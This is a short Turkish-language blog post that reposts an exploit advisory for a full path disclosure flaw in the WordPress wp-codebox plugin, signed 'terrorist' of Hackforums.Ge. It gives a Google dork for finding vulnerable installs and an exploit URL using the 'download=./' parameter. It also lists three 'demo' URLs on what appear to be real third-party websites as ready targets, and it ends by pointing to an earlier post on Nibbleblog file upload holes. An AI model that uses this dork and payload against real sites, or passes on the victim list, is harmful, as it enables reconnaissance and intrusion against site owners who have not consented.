WordPress wp-codebox Plugin Full Path Disclosure açığı bulundu. Açığın oluşum yeri ve açık hakkındaki açıklamalar aşağıdaki şekilde;
#------------------------------------------------------------------------------------------------------------------ # Exploit Title: WordPress wp-codebox plugin Full Path Disclosure vulnerability # Date: 14/01/2012 # Author: terrorist # Tested on: Fedora17 && Windows7 # Site: Hackforums.Ge # Google dork: inurl:"wp-content/plugins/wp-codebox" #------------------------------------------------------------------------------------------------------------------ # Exploit: http://localhost/wp-content/plugins/wp-codebox/wp-codebox.php?p=1&download=./ # Demos: http://www.secsavvy.com/wp-content/plugins/wp-codebox/wp-codebox.php?p=68&download=./ http://blog.cakephp-brasil.org/wp-content/plugins/wp-codebox/wp-codebox.php?p=68&download=./ http://www.amiel-donat.com/wp-content/plugins/wp-codebox/wp-codebox.php?p=68&download=./
Bir önceki yazımız olan Nibbleblog v3.4 (ajax) <= (FD/FU) Multiple Vulnerabilities başlıklı makalemizde Nibbleblog v3.4 (ajax) Açığı, Nibbleblog v3.4 (ajax) php file upload açığı ve php file upload açıkları hakkında bilgiler verilmektedir.